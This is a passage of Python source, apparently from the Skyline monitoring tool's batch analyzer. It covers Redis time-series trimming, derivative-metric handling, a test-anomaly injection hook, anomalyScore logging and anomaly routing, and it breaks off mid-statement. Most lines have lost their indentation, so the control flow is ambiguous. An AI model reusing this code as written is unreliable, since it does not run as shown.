# Allow for custom durations on namespaces, this is for testing to
# allow the Redis key to have data at a different resolution than
# FULL_DURATION, which allows for feeding a metric at 1 data point
# per 10 mins (ala fake Mirage)
try:
if ROOMBA_BATCH_METRICS_CUSTOM_DURATIONS:
for metric_namespace, custom_full_duration in ROOMBA_BATCH_METRICS_CUSTOM_DURATIONS:
if metric_namespace in base_name:
duration = custom_full_duration + settings.ROOMBA_GRACE_TIME
logger.info('batch_processing :: %s found in ROOMBA_BATCH_METRICS_CUSTOM_DURATIONS, duration for roomba set to %s' % (
base_name, str(duration)))
except:
logger.error(traceback.format_exc())
                    logger.error('error :: analyzer_batch :: failed to determine a custom roomba duration for %s from ROOMBA_BATCH_METRICS_CUSTOM_DURATIONS' % base_name)
namespace_unique_metrics = '%sunique_metrics' % str(settings.FULL_NAMESPACE)
euthanized = 0
trimmed_keys = 0
active_keys = 0
try:
# Put pipe back in multi mode
pipe = self.redis_conn.pipeline()
# WATCH the key
pipe.watch(key)
pipe.multi()
# There's one value. Purge if it's too old
last_timestamp = int(timeseries[-1][0])
# Do not purge if it has not been analyzed
if (last_timestamp - duration) > last_analyzed_timestamp:
logger.info('batch_processing :: last_timestamp is %s, but for roomba setting to the last_analyzed_timestamp (%s) as it has not been analyzed' % (
str(last_timestamp), str(last_analyzed_timestamp)))
last_timestamp = last_analyzed_timestamp
now = int(last_analyzed_timestamp)
logger.info('batch_processing :: doing roomba on %s with %s data points' % (key, str(len(timeseries))))
roombaed = True
try:
if python_version == 2:
if not isinstance(timeseries[0], TupleType):
if timeseries[0] < last_timestamp - duration:
pipe.delete(key)
pipe.srem(namespace_unique_metrics, key)
pipe.execute()
euthanized += 1
timeseries = []
if python_version == 3:
if not isinstance(timeseries[0], tuple):
if timeseries[0] < now - duration:
pipe.delete(key)
pipe.srem(namespace_unique_metrics, key)
pipe.execute()
euthanized += 1
timeseries = []
except IndexError:
timeseries = []
# Check if the last value is too old and purge
if timeseries[-1][0] < now - duration:
pipe.delete(key)
pipe.srem(namespace_unique_metrics, key)
pipe.execute()
euthanized += 1
timeseries = []
# Remove old datapoints and duplicates from timeseries
temp = set()
temp_add = temp.add
delta = now - duration
trimmed = [
tuple for tuple in timeseries
if tuple[0] > delta and
tuple[0] not in temp and not
temp_add(tuple[0])
]
# Purge if everything was deleted, set key otherwise
if len(trimmed) > 0:
# Serialize and turn key back into not-an-array
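                        # A packed msgpack list starts with an array header -
                        # 1 byte (fixarray) for up to 15 items, 3 bytes
                        # (array 16) for up to 65535 items and 5 bytes
                        # (array 32) beyond that - which the slices below strip
                        # so the stored value is a plain stream of packed
                        # datapoints rather than an array.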
btrimmed = packb(trimmed)
if len(trimmed) <= 15:
value = btrimmed[1:]
elif len(trimmed) <= 65535:
value = btrimmed[3:]
trimmed_keys += 1
else:
value = btrimmed[5:]
trimmed_keys += 1
pipe.set(key, value)
active_keys += 1
else:
pipe.delete(key)
pipe.srem(namespace_unique_metrics, key)
euthanized += 1
pipe.execute()
except WatchError:
logger.info('batch_processing :: blocked from euthanizing %s' % (key))
except Exception as e:
# If something bad happens, zap the key and hope it goes away
# pipe.delete(key)
# pipe.srem(namespace_unique_metrics, key)
# pipe.execute()
# euthanized += 1
logger.info(e)
logger.info('batch_processing :: something bad happened but not euthanizing %s' % (key))
finally:
pipe.reset()
raw_series = None
try:
raw_series = self.redis_conn.get(metric_name)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to get %s from Redis' % metric_name)
raw_series = None
if not raw_series:
logger.info('No raw_series defined after euthanizing %s, returning' % (key))
# Remove for work list
redis_set = 'analyzer.batch'
data = [metric_name, int(last_analyzed_timestamp)]
try:
self.redis_conn.srem(redis_set, str(data))
logger.info('analyzer_batch :: removed batch metric item - %s - from Redis set - %s' % (str(data), redis_set))
except:
logger.error(traceback.format_exc())
logger.error('error :: analyzer_batch :: failed to remove batch metric item - %s - from Redis set - %s' % (str(data), redis_set))
if batch_mode:
continue
else:
return
try:
unpacker = Unpacker(use_list=False)
unpacker.feed(raw_series)
timeseries = list(unpacker)
if roombaed:
logger.info('batch_processing :: after roomba %s has %s data points' % (key, str(len(timeseries))))
except:
timeseries = []
# @added 20200506 - Feature #3532: Sort all time series
# To ensure that there are no unordered timestamps in the time
# series which are artefacts of the collector or carbon-relay, sort
# all time series by timestamp before analysis.
original_timeseries = timeseries
if original_timeseries:
timeseries = sort_timeseries(original_timeseries)
del original_timeseries
try:
del raw_series
except:
pass
timestamps_to_analyse = []
            # Reverse the time series so that only the most recent items need
            # to be iterated, and break after the necessary iterations so that
            # the entire time series is not traversed.
reversed_timeseries = list(reversed(timeseries))
for timestamp, value in reversed_timeseries:
if int(timestamp) > last_analyzed_timestamp:
timestamps_to_analyse.append(int(timestamp))
else:
break
del reversed_timeseries
timestamps_to_analyse = list(reversed(timestamps_to_analyse))
# @added 20200413 - Feature #3486: analyzer_batch
# Feature #3480: batch_processing
# Handle there being no timestamps_to_analyse and report such as
# otherwise the only info logged is that the work key just gets removed
# 2020-04-14 12:57:25 :: 3222 :: there are 1 metrics to process in the analyzer.batch Redis set
# 2020-04-14 12:57:25 :: 3222 :: processing - ['vista.demo_robustperception_io.prometheus.node_disk_read_time_seconds_total', 1586868000]
# 2020-04-14 12:57:25 :: 3222 :: starting 1 of 1 spin_batch_process
# 2020-04-14 12:57:25 :: 7852 :: batch :: child_batch_process_pid - 7852, processing vista.demo_robustperception_io.prometheus.node_disk_read_time_seconds_total from 1586868000
# 2020-04-14 12:57:25 :: 7852 :: analyzer_batch :: removed work item - ['vista.demo_robustperception_io.prometheus.node_disk_read_time_seconds_total', 1586868000] - from Redis set - analyzer.batch
# 2020-04-14 12:57:25 :: 7852 :: spin_batch_process took 0.04 seconds
# 2020-04-14 12:57:25 :: 3222 :: 1 spin_batch_process completed in 0.10 seconds
# 2020-04-14 12:57:25 :: 3222 :: exceptions - Stale: 9, Boring: 6, TooShort: 0, Other: 0
# 2020-04-14 12:57:25 :: 3222 :: anomaly_breakdown - histogram_bins: 0, first_hour_average: 0, stddev_from_average: 0, grubbs: 0, ks_test: 0, mean_subtraction_cumulation: 0, median_absolute_deviation: 0, stddev_from_moving_average: 0, least_squares: 0
number_of_timestamps_to_analyze = len(timestamps_to_analyse)
if number_of_timestamps_to_analyze == 0:
logger.info('no timestamps were found to analyze for %s from %s, nothing to do' % (
metric_name, str(last_analyzed_timestamp)))
# @added 20200424 - Feature #3486: analyzer_batch
# Feature #3480: batch_processing
# Feature #3504: Handle airgaps in batch metrics
# If there are no data points to analyze remove from the set
redis_set = 'analyzer.batch'
data = [metric_name, int(last_analyzed_timestamp)]
try:
self.redis_conn.srem(redis_set, str(data))
logger.info('analyzer_batch :: removed batch metric item - %s - from Redis set - %s' % (str(data), redis_set))
except:
logger.error(traceback.format_exc())
logger.error('error :: analyzer_batch :: failed to remove batch metric item - %s - from Redis set - %s' % (str(data), redis_set))
# Clean up and return
try:
del timeseries
except:
pass
try:
del timestamps_to_analyse
except:
pass
try:
del batch_timeseries
except:
pass
if batch_mode:
continue
else:
try:
del mirage_unique_metrics
except:
pass
try:
del ionosphere_unique_metrics
except:
pass
try:
del derivative_metrics
except:
pass
try:
del non_derivative_metrics
except:
pass
try:
del non_derivative_monotonic_metrics
except:
pass
try:
del non_smtp_alerter_metrics
except:
pass
return
else:
last_redis_data_timestamp = timestamps_to_analyse[-1]
logger.info('%s timestamps were found to analyze for %s from %s to %s' % (
str(number_of_timestamps_to_analyze), metric_name,
str(last_analyzed_timestamp), str(last_redis_data_timestamp)))
# @modified 20200728 - Bug #3652: Handle multiple metrics in base_name conversion
# base_name = metric_name.replace(settings.FULL_NAMESPACE, '', 1)
if metric_name.startswith(settings.FULL_NAMESPACE):
base_name = metric_name.replace(settings.FULL_NAMESPACE, '', 1)
else:
base_name = metric_name
# @added 20200425 - Feature #3508: ionosphere.untrainable_metrics
# Determine if any metrics have negative values so that they can be
# added to the ionosphere_untrainable_metrics Redis set
run_negatives_present = False
if settings.IONOSPHERE_ENABLED:
run_negatives_present = True
try:
known_negative_metric_matched_by = None
known_negative_metric, known_negative_metric_matched_by = matched_or_regexed_in_list(skyline_app, base_name, KNOWN_NEGATIVE_METRICS)
if known_negative_metric:
run_negatives_present = False
except:
run_negatives_present = True
# @added 20170602 - Feature #2034: analyse_derivatives
# In order to convert monotonic, incrementing metrics to a derivative
# metric
known_derivative_metric = False
unknown_deriv_status = True
# @modified 20200601 - Feature #3480: batch_processing
# Bug #2050: analyse_derivatives - change in monotonicity
# Switch the order in which they are checked and do not check if
# not manage_derivative_metrics as will only be set to True anyway
# if metric_name in non_derivative_metrics:
# unknown_deriv_status = False
# if unknown_deriv_status:
# if metric_name in derivative_metrics:
# known_derivative_metric = True
# unknown_deriv_status = False
if metric_name in derivative_metrics:
known_derivative_metric = True
unknown_deriv_status = False
if unknown_deriv_status:
if metric_name in non_derivative_metrics:
unknown_deriv_status = False
# First check if it has its own Redis z.derivative_metric key
# that has not expired
derivative_metric_key = 'z.derivative_metric.%s' % str(base_name)
# @added 20200601 - Feature #3480: batch_processing
# Bug #2050: analyse_derivatives - change in monotonicity
# When a metric's monotonicity changes in the last run before a
# manage_derivative_metrics run, manage_derivative_metrics reclassifies
# it and adds it to non_derivative_metrics. The only way to stop this is
# to check the key for each metric.
last_derivative_metric_key = None
try:
last_derivative_metric_key = self.redis_conn_decoded.get(derivative_metric_key)
except Exception as e:
logger.error('error :: could not query Redis for last_derivative_metric_key: %s' % e)
if last_derivative_metric_key:
known_derivative_metric = True
if unknown_deriv_status:
# @added 20170617 - Bug #2050: analyse_derivatives - change in monotonicity
# @modified 20200601 - Feature #3480: batch_processing
# Bug #2050: analyse_derivatives - change in monotonicity
# Always check moved to above
# last_derivative_metric_key = False
# try:
# last_derivative_metric_key = self.redis_conn.get(derivative_metric_key)
# except Exception as e:
# logger.error('error :: could not query Redis for last_derivative_metric_key: %s' % e)
# @modified 20200601 - Feature #3480: batch_processing
# Bug #2050: analyse_derivatives - change in monotonicity
# Apply skip_derivative
skip_derivative = in_list(base_name, non_derivative_monotonic_metrics)
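# Metrics declared as non derivative monotonic are never converted to a
# derivative, even if they are strictly increasing monotonically.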
is_strictly_increasing_monotonically = False
if not skip_derivative:
is_strictly_increasing_monotonically = strictly_increasing_monotonicity(timeseries)
if is_strictly_increasing_monotonically:
try:
last_expire_set = int(time())
self.redis_conn.setex(
derivative_metric_key, settings.FULL_DURATION, last_expire_set)
except Exception as e:
logger.error('error :: could not set Redis derivative_metric key: %s' % e)
else:
is_strictly_increasing_monotonically = False
# Determine if it is a strictly increasing monotonically metric
# or has been in last FULL_DURATION via its z.derivative_metric
# key
if last_derivative_metric_key:
# Until the z.derivative_metric key expires, it is classed
# as such
is_strictly_increasing_monotonically = True
if skip_derivative:
is_strictly_increasing_monotonically = False
if is_strictly_increasing_monotonically:
known_derivative_metric = True
try:
self.redis_conn.sadd('derivative_metrics', metric_name)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to add metric to Redis derivative_metrics set')
try:
self.redis_conn.sadd('new_derivative_metrics', metric_name)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to add metric to Redis new_derivative_metrics set')
try:
last_expire_set = int(time())
self.redis_conn.setex(
derivative_metric_key, settings.FULL_DURATION, last_expire_set)
except Exception as e:
logger.error('error :: could not set Redis derivative_metric key: %s' % e)
# @added 20210325 - Feature #3480: batch_processing
# Bug #2050: analyse_derivatives - change in monotonicity
# Remove from non_derivative_metrics as per analyzer
try:
self.redis_conn.srem('non_derivative_metrics', metric_name)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to remove metric from Redis non_derivative_metrics set')
else:
try:
self.redis_conn.sadd('non_derivative_metrics', metric_name)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to add metric to Redis non_derivative_metrics set')
try:
self.redis_conn.sadd('new_non_derivative_metrics', metric_name)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to add metric to Redis new_non_derivative_metrics set')
not_anomalous_count = 0
# @added 20200815 - Feature #3678: SNAB - anomalyScore
record_anomalyScore = False
if SNAB_anomalyScore:
SNAB_metrics = []
try:
SNAB_all_metrics = SNAB_anomalyScore['all']
if SNAB_all_metrics:
for SNAB_metric in SNAB_all_metrics:
SNAB_metrics.append(SNAB_metric)
except:
SNAB_all_metrics = []
try:
SNAB_app_metrics = SNAB_anomalyScore[skyline_app]
if SNAB_app_metrics:
for SNAB_metric in SNAB_app_metrics:
SNAB_metrics.append(SNAB_metric)
except:
SNAB_app_metrics = []
if SNAB_metrics:
for SNAB_metric_namespace in list(set(SNAB_metrics)):
if SNAB_metric_namespace in base_name:
record_anomalyScore = True
break
test_anomaly = False
test_anomaly_at = None
try:
test_anomaly_key = 'analyzer_batch.test.%s' % base_name
try:
test_anomaly = self.redis_conn.get(test_anomaly_key)
test_anomaly_at = int(test_anomaly)
logger.info('test_anomaly - testing anomaly on %s at %s' % (metric_name, str(test_anomaly_at)))
except:
test_anomaly = None
except:
test_anomaly = False
# Distill timeseries strings into lists
for i, batch_timestamp in enumerate(timestamps_to_analyse):
self.check_if_parent_is_alive()
batch_timeseries = []
for timestamp, value in timeseries:
if int(timestamp) <= batch_timestamp:
batch_timeseries.append([timestamp, value])
if known_derivative_metric:
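# Convert the monotonically increasing counter into its per interval
# deltas so the algorithms analyse the rate of change rather than the
# ever increasing raw value, nonNegativeDerivative ignores negative
# deltas such as counter resets.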
try:
derivative_timeseries = nonNegativeDerivative(batch_timeseries)
batch_timeseries = derivative_timeseries
except:
logger.error('error :: nonNegativeDerivative failed')
try:
# Allow for testing. If you want to test a metric and then stop
# the metric sending data to carbon-relay (use a vista metric).
# Determine a timestamp that will fall into the stopped period
# Add the timestamp to a Redis key called
# analyzer_batch.test.<metric_name>
# Start the metric sending data again (re-enable in vista)
# vista/flux will fill the missing data, when analyzer pushes
# the metric to analyzer_batch to process, if analyzer_batch
# is set to test_anomaly True and finds the key, if the
# timestamp matches the timestamp in the key, analyzer_batch
# will multiply that data point's value by 100, which should
# trigger an anomaly. Ensure you use a metric which will
# trigger; a load related metric is usually adequate.
# test_anomaly = False
test_anomaly_at = None
test_anomaly_batch_timeseries = []
if test_anomaly:
test_anomaly_at = None
test_anomaly_key = 'analyzer_batch.test.%s' % base_name
try:
test_anomaly_at = self.redis_conn.get(test_anomaly_key)
except:
test_anomaly_at = None
if test_anomaly_at:
if int(test_anomaly_at) == int(batch_timeseries[-1][0]):
for timestamp, value in batch_timeseries:
if int(timestamp) == int(test_anomaly_at):
anomaly_value = value * 100
logger.info('test_anomaly - replacing value %s with anomaly_value of %s at %s in %s timeseries' % (
str(value), str(anomaly_value),
str(test_anomaly_at), metric_name))
value = anomaly_value
test_anomaly_batch_timeseries.append([timestamp, value])
if test_anomaly_batch_timeseries:
batch_timeseries = test_anomaly_batch_timeseries
logger.info('test_anomaly - replaced %s timeseries with anomaly value in it' % (
metric_name))
try:
self.redis_conn.delete(test_anomaly_key)
logger.info('test_anomaly - deleted test_anomaly Redis key - %s' % str(test_anomaly_key))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to delete test_anomaly Redis key - %s' % str(test_anomaly_key))
# @modified 20200423 - Feature #3504: Handle airgaps in batch metrics
# Feature #3480: batch_processing
# Feature #3486: analyzer_batch
# Changed to algorithms_batch so there is no pollution and
# analyzer and analyzer_batch are totally independent
# metric_airgaps = []
# anomalous, ensemble, datapoint = run_selected_algorithm(batch_timeseries, metric_name, metric_airgaps)
# @modified 20200425 - Feature #3508: ionosphere.untrainable_metrics
# Added run_negatives_present and added negatives_found
# anomalous, ensemble, datapoint = run_selected_batch_algorithm(batch_timeseries, metric_name)
# @modified 20200607 - Feature #3566: custom_algorithms
# Added algorithms_run
# @modified 20200815 - Feature #3678: SNAB - anomalyScore
# Added the number_of_algorithms to calculate anomalyScore from
anomalous, ensemble, datapoint, negatives_found, algorithms_run, number_of_algorithms = run_selected_batch_algorithm(batch_timeseries, metric_name, run_negatives_present)
if test_anomaly_batch_timeseries:
logger.info('test_anomaly - analyzed %s data with anomaly value in it and anomalous = %s' % (
metric_name, str(anomalous)))
# @added 20200815 - Feature #3678: SNAB - anomalyScore
if record_anomalyScore:
anomalyScore_file = '%s/%s/%s/skyline.SNAB.%s.anomalyScore.csv' % (
SNAB_DATA_DIR, skyline_app, base_name, base_name)
# Get the anomaly breakdown - who returned True?
triggered_algorithms = []
run_debug = False
if ensemble.count(True) and algorithms_run:
run_debug = True
if (int(batch_timestamp) % 20000) == 0:
run_debug = True
if run_debug:
logger.debug('debug :: ensemble to calculate anomalyScore - %s' % str(ensemble))
logger.debug('debug :: algorithms_run to calculate anomalyScore - %s' % str(algorithms_run))
for index, value in enumerate(ensemble):
if value:
algorithm = algorithms_run[index]
triggered_algorithms.append(algorithm)
if run_debug:
logger.debug('debug :: triggered_algorithms to calculate anomalyScore - %s' % str(triggered_algorithms))
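# anomalyScore expresses how close the data point came to the CONSENSUS
# threshold, the number of triggered algorithms divided by CONSENSUS,
# capped at 1.0 when more algorithms than CONSENSUS triggered.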
anomalyScore = 0.0
try:
if len(triggered_algorithms) > 0 and number_of_algorithms > 0:
if len(triggered_algorithms) > settings.CONSENSUS:
anomalyScore = 1.0
else:
anomalyScore = len(triggered_algorithms) / settings.CONSENSUS
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to calculate anomalyScore')
if not os.path.isfile(anomalyScore_file):
data = 'timestamp,value,anomalyScore,triggered_algorithms\n'
write_data_to_file(skyline_app, anomalyScore_file, 'w', data)
data = '%s,%s,%s,%s\n' % (str(int(batch_timestamp)), str(datapoint), str(anomalyScore), str(triggered_algorithms))
write_data_to_file(skyline_app, anomalyScore_file, 'a', data)
if run_debug:
logger.debug('%s,%s,%s,%s' % (str(int(batch_timestamp)), str(datapoint), str(anomalyScore), str(triggered_algorithms)))
# Update the last_timestamp metric Redis key
last_metric_timestamp_key = 'last_timestamp.%s' % base_name
redis_key_set = None
try:
int_metric_timestamp = int(batch_timestamp)
# @modified 20200503 - Feature #3504: Handle airgaps in batch metrics
# Feature #3480: batch_processing
# Feature #3486: analyzer_batch
# Set the last_timestamp expiry time to 1 month rather than
# settings.FULL_DURATION
self.redis_conn.setex(
last_metric_timestamp_key, 2592000, int_metric_timestamp)
redis_key_set = True
except:
logger.error('error :: failed to set Redis key %s' % last_metric_timestamp_key)
if anomalous:
if redis_key_set:
logger.info('anomalous :: anomaly detected on %s at %s with %s, set Redis key %s to %s' % (
base_name, str(int_metric_timestamp), str(datapoint),
last_metric_timestamp_key, str(int_metric_timestamp)))
else:
logger.info('anomalous :: anomaly detected on %s at %s with %s' % (
base_name, str(int_metric_timestamp),
str(datapoint)))
# @added 20200425 - Feature #3508: ionosphere.untrainable_metrics
# Determine if any metrics have negative values so that they can be
# added to the ionosphere.untrainable_metrics Redis set
if run_negatives_present and negatives_found:
redis_set = 'ionosphere.untrainable_metrics'
try:
last_negative_timestamp = int(negatives_found[-1][0])
last_negative_value = negatives_found[-1][1]
remove_after_timestamp = int(last_negative_timestamp + settings.FULL_DURATION)
data = str([metric_name, batch_timestamp, datapoint, last_negative_timestamp, last_negative_value, settings.FULL_DURATION, remove_after_timestamp])
self.redis_conn.sadd(redis_set, data)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to add data to Redis set %s' % (
str(redis_set)))
# Added a Redis key for Mirage, Panorama and Ionosphere to
# query to identify if an anomaly has been added by
# analyzer_batch and set a longish TTL as if multiple
# anomalies for multiple metrics in a batch are sent to
# Ionosphere it could take Ionosphere a while to analyze
# them all. This key circumvents the requirement of each
# app to determine if a metric is a batch metric, as this
# is only created for batch metric anomalies.
analyzer_batch_metric_anomaly_key = '%s.anomaly.%s.%s' % (
skyline_app, str(int_metric_timestamp), base_name)
try:
int_metric_timestamp = int(batch_timestamp)
self.redis_conn.setex(
analyzer_batch_metric_anomaly_key,
3600, int_metric_timestamp)
logger.info('set Redis key %s with %s for other apps to identify this as an analyzer_batch anomaly' % (
analyzer_batch_metric_anomaly_key,
str(int_metric_timestamp)))
except:
logger.error('error :: failed to set Redis key %s' % analyzer_batch_metric_anomaly_key)
else:
if redis_key_set:
not_anomalous_count += 1
# @modified 20200728 - Feature #3480: batch_processing
# Feature #3486: analyzer_batch
# Only log on the last data point, not on all
if int_metric_timestamp == int(last_redis_data_timestamp):
logger.info('not anomalous :: %s at %s with %s (along with %s other not anomalous data points), set Redis key %s to %s' % (
base_name, str(int_metric_timestamp), str(datapoint),
str(not_anomalous_count),
last_metric_timestamp_key, str(int_metric_timestamp)))
else:
logger.info('not anomalous :: %s at %s with %s' % (
base_name, str(int_metric_timestamp),
str(datapoint)))
# @added 20190408 - Feature #2882: Mirage - periodic_check
# Added for Mirage periodic checks - if really anomalous add to
# real_anomalous_metrics and, if in mirage_periodic_check_metric_list,
# add as anomalous
if anomalous:
metric_timestamp = batch_timeseries[-1][0]
metric = [datapoint, base_name, metric_timestamp]
# Get the anomaly breakdown - who returned True?
triggered_algorithms = []
for index, value in enumerate(ensemble):
if value:
# @modified 20200607 - Feature #3566: custom_algorithms
# algorithm = settings.ALGORITHMS[index]
algorithm = algorithms_run[index]
anomaly_breakdown[algorithm] += 1
triggered_algorithms.append(algorithm)
# @added 20170206 - Bug #1904: Handle non filesystem friendly metric names in check files
sane_metricname = filesafe_metricname(str(base_name))
# If Panorama is enabled determine details
determine_anomaly_details = False
if settings.PANORAMA_ENABLED:
determine_anomaly_details = True
# If Ionosphere is enabled determine details
try:
ionosphere_enabled = settings.IONOSPHERE_ENABLED
if settings.IONOSPHERE_ENABLED:
determine_anomaly_details = True
except:
ionosphere_enabled = False
if determine_anomaly_details:
metric_timestamp = str(int(batch_timeseries[-1][0]))
from_timestamp = str(int(batch_timeseries[1][0]))
timeseries_dir = base_name.replace('.', '/')
send_back_to_analyzer = None
# @added 20161119 - Branch #922: ionosphere
# Task #1718: review.tsfresh
# Set defaults which can be used later to determine how
# Analyzer should handle/route anomalies
analyzer_metric = True
mirage_metric = False
ionosphere_metric = False
send_to_ionosphere = False
if metric_name in ionosphere_unique_metrics:
ionosphere_metric = True
send_to_ionosphere = True
if metric_name in mirage_unique_metrics:
analyzer_metric = False
ionosphere_metric = False
mirage_metric = True
send_to_ionosphere = False
# @added 20170108 - Feature #1830: Ionosphere alerts
# Only send smtp_alerter_metrics to Ionosphere
smtp_alert_enabled_metric = True
if base_name in non_smtp_alerter_metrics:
smtp_alert_enabled_metric = False
if ionosphere_enabled:
if analyzer_metric:
# We do not want to send all anomalous metrics to
# Ionosphere if they are not being alerted on, as that
# would be pointless: there will be no alert if it is
# within the EXPIRATION_TIME and there will be no
# reference graphs from an alert for the user to
# action.
cache_key = 'last_alert.smtp.%s' % (base_name)
last_alert = False
try:
last_alert = self.redis_conn.get(cache_key)
except Exception as e:
logger.error('error :: could not query Redis for cache_key: %s' % e)
if not last_alert:
send_to_ionosphere = True
else:
send_to_ionosphere = False
if ionosphere_metric:
logger.info('not sending to Ionosphere - alert key exists - %s' % (base_name))
else:
if mirage_metric:
logger.info('not sending to Ionosphere - Mirage metric - %s' % (base_name))
send_to_ionosphere = False
# analyzer_batch sends Analyzer and Mirage
# metrics back to analyzer
send_back_to_analyzer = True
# @added 20170306 - Feature #1960: ionosphere_layers
# Ionosphere layers require the timeseries at
# FULL_DURATION so if this is a Mirage and
# Ionosphere metric, Analyzer needs to provide
# the timeseries file for later (within 60
# seconds) analysis, however we want the data
# that triggered the anomaly, as before this was
# only created by Mirage if an alert was
# triggered, but Ionosphere layers now require
# this file before an alert is triggered
timeseries_dir = base_name.replace('.', '/')
training_dir = '%s/%s/%s' % (
settings.IONOSPHERE_DATA_FOLDER, str(metric_timestamp),
str(timeseries_dir))
if not os.path.exists(training_dir):
mkdir_p(training_dir)
full_duration_in_hours = int(settings.FULL_DURATION) / 3600
ionosphere_json_file = '%s/%s.mirage.redis.%sh.json' % (
training_dir, base_name,
str(int(full_duration_in_hours)))
if not os.path.isfile(ionosphere_json_file):
timeseries_json = str(batch_timeseries).replace('[', '(').replace(']', ')')
try:
write_data_to_file(skyline_app, ionosphere_json_file, 'w', timeseries_json)
logger.info('%s added Ionosphere Mirage %sh Redis data timeseries json file :: %s' % (
skyline_app, str(int(full_duration_in_hours)), ionosphere_json_file))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to add %s Ionosphere Mirage Redis data timeseries json file - %s' % (skyline_app, ionosphere_json_file))
# @modified 20170108 - Feature #1830: Ionosphere alerts
# Only send smtp_alerter_metrics to Ionosphere
# if send_to_ionosphere:
if send_to_ionosphere and smtp_alert_enabled_metric:
if metric_name in ionosphere_unique_metrics:
logger.info('sending an ionosphere metric to Ionosphere - %s' % (base_name))
else:
logger.info('sending an analyzer metric to Ionosphere for training - %s' % (base_name))
try:
# @modified 20161228 Feature #1828: ionosphere - mirage Redis data features
# Added full_duration
# @modified 20170127 - Feature #1886: Ionosphere learn - child like parent with evolutionary maturity
# Added ionosphere_parent_id, always zero from Analyzer and Mirage
ionosphere_parent_id = 0
send_anomalous_metric_to(
skyline_app, 'ionosphere', timeseries_dir,
metric_timestamp, base_name, str(datapoint),
from_timestamp, triggered_algorithms,
batch_timeseries, str(settings.FULL_DURATION),
str(ionosphere_parent_id))
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# Moved to Redis key block below
# self.sent_to_ionosphere.append(base_name)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to send_anomalous_metric_to to ionosphere')
# @added 20190522 - Task #3034: Reduce multiprocessing Manager list usage
redis_set = 'analyzer.batch.sent_to_ionosphere'
data = str(base_name)
try:
self.redis_conn.sadd(redis_set, data)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to add %s to Redis set %s' % (
str(data), str(redis_set)))
# @added 20170403 - Feature #1994: Ionosphere training_dir keys
# Feature #2000: Ionosphere - validated
# Feature #1996: Ionosphere - matches page
# The addition of this key data could be done in
# skyline_function.py, however that would introduce
# Redis requirements in the send_anomalous_metric_to
# function, which is not desirable I think. So this is
# a non-KISS pattern that is replicated in mirage.py as
# well.
# Each training_dir and data set is now Redis keyed to increase efficiency
# in terms of disk I/O for ionosphere.py and making keyed data
# available for each training_dir data set so that transient matched data
# can be surfaced for the webapp along with directory paths, etc
ionosphere_training_data_key = 'ionosphere.training_data.%s.%s' % (str(metric_timestamp), base_name)
ionosphere_training_data_key_data = [
['metric_timestamp', int(metric_timestamp)],
['base_name', str(base_name)],
['timeseries_dir', str(timeseries_dir)],
['added_by', str(skyline_app)]
]
try:
self.redis_conn.setex(
ionosphere_training_data_key,
settings.IONOSPHERE_KEEP_TRAINING_TIMESERIES_FOR,
# @modified 20190413 - Task #2824: Test redis-py upgrade
# Task #2926: Update dependencies
# redis-py 3.x only accepts user data as bytes, strings or
# numbers (ints, longs and floats). All 2.X users should
# make sure that the keys and values they pass into redis-py
# are either bytes, strings or numbers. Use str
str(ionosphere_training_data_key_data))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to set Redis key %s' % ionosphere_training_data_key)
try:
del ionosphere_training_data_key_data
except:
pass
if ionosphere_metric:
analyzer_metric = False
# Only send Analyzer metrics
if analyzer_metric and settings.PANORAMA_ENABLED:
if not os.path.exists(settings.PANORAMA_CHECK_PATH):
mkdir_p(settings.PANORAMA_CHECK_PATH)
# Note:
# The values are enclosed in single quotes intentionally
# as the imp.load_source used results in a shift in the
# decimal position when double quoted, e.g.
# value = "5622.0" gets imported as
# 2016-03-02 12:53:26 :: 28569 :: metric variable - value - 562.2
# single quoting results in the desired,
# 2016-03-02 13:16:17 :: 1515 :: metric variable - value - 5622.0
added_at = str(int(time()))
source = 'graphite'
panorama_anomaly_data = 'metric = \'%s\'\n' \
'value = \'%s\'\n' \
'from_timestamp = \'%s\'\n' \
'metric_timestamp = \'%s\'\n' \
'algorithms = %s\n' \
'triggered_algorithms = %s\n' \
'app = \'%s\'\n' \
'source = \'%s\'\n' \
'added_by = \'%s\'\n' \
'added_at = \'%s\'\n' \
% (base_name, str(datapoint), from_timestamp,
# @modified 20200603 - Feature #3566: custom_algorithms
# metric_timestamp, str(settings.ALGORITHMS),
metric_timestamp, str(algorithms_run),
triggered_algorithms, skyline_app, source,
this_host, added_at)
# Create an anomaly file with details about the anomaly
panorama_anomaly_file = '%s/%s.%s.txt' % (
settings.PANORAMA_CHECK_PATH, added_at,
sane_metricname)
try:
write_data_to_file(
skyline_app, panorama_anomaly_file, 'w',
panorama_anomaly_data)
logger.info('added panorama anomaly file :: %s' % (panorama_anomaly_file))
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# Moved to Redis set block below
# self.sent_to_panorama.append(base_name)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to add panorama anomaly file :: %s' % (panorama_anomaly_file))
try:
del panorama_anomaly_data
except:
pass
redis_set = 'analyzer_batch.sent_to_panorama'
data = str(base_name)
try:
self.redis_conn.sadd(redis_set, data)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to add %s to Redis set %s' % (
str(data), str(redis_set)))
else:
# @modified 20160207 - Branch #922: Ionosphere
# Handle if all other apps are not enabled
other_app = 'none'
if mirage_metric:
other_app = 'Mirage'
if ionosphere_metric:
other_app = 'Ionosphere'
logger.info('not adding panorama anomaly file for %s - %s' % (other_app, metric))
# Send back to Analyzer to alert
if analyzer_metric:
send_back_to_analyzer = True
if send_back_to_analyzer:
cache_key = '%s.alert.%s.%s' % (skyline_app, metric_timestamp, base_name)
# @modified 20201008 - Feature #3772: Add the anomaly_id to the http_alerter json
# Branch #3068: SNAB
# Added algorithms_run
cache_key_value = [float(datapoint), base_name, int(metric_timestamp), triggered_algorithms, algorithms_run]
try:
self.redis_conn.setex(
cache_key, 300,
